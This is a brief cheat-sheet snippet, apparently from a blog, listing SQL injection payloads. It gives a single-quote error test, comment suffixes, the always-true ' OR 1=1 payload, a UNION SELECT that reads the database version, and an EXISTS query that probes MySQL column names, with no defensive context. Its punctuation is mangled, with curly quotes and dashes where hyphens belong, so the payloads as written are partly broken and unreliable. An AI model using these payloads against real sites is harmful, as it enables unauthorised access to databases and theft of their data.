To determine if SQL injection is possible you can try to get an error by using “ ‘ ” charc Always try to add a comment like this “ — -”
’ OR 1=1 — -
— This to get os version :
’ union select null, version()#
— To get column name (MySQL) →
OR EXISTS (SELECT COUNT(column) FROM user) —